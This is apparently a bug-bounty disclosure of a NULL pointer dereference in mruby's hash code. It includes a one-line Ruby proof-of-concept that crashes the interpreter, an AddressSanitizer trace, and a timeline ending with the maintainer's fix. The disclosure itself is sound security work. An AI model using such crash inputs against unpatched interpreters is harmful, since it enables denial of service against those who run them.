NULL Pointer Dereference in mruby/mruby

Status: Valid

Reported on Sep 24th 2021


Description

NULL pointer dereference in ea_set (src/hash.c:463), reached via ar_set, h_set and mrb_hash_set when the interpreter evaluates the script below. AddressSanitizer reports the faulting access as a write to address 0x1, i.e. a NULL-based pointer.

Proof of Concept

```ruby
# poc.rb
[ ** ...1, From: +- ~2]
```

Result

```
$ mruby/bin/mruby poc.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28787==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x55b05da25a1a bp 0x7fffa04443e0 sp 0x7fffa04443c0 T0)
==28787==The signal is caused by a WRITE memory access.
==28787==Hint: address points to the zero page.
    #0 0x55b05da25a19 in ea_set /home/zx/asanmruby/src/hash.c:463
    #1 0x55b05da261df in ar_set /home/zx/asanmruby/src/hash.c:540
    #2 0x55b05da296f1 in h_set /home/zx/asanmruby/src/hash.c:1004
    #3 0x55b05da2aa4c in mrb_hash_set /home/zx/asanmruby/src/hash.c:1246
    #4 0x55b05da63f11 in mrb_vm_exec /home/zx/asanmruby/src/vm.c:2692
    #5 0x55b05da42182 in mrb_vm_run /home/zx/asanmruby/src/vm.c:1032
    #6 0x55b05da8345c in mrb_top_run /home/zx/asanmruby/src/vm.c:2969
    #7 0x55b05daafdef in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6896
    #8 0x55b05dab00dd in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #9 0x55b05d9ae092 in main /home/zx/asanmruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #10 0x7f3a69d830b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #11 0x55b05d9ab42d in _start (/home/zx/asanmruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/zx/asanmruby/src/hash.c:463 in ea_set
==28787==ABORTING
```
We have contacted a member of the mruby team and are waiting to hear back 2 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 months ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs

Yukihiro (Maintainer), 2 months ago:

Fixed by c70159b3562e09a37577b4c6913de3ec7b8f06b4

Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on c70159 2 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty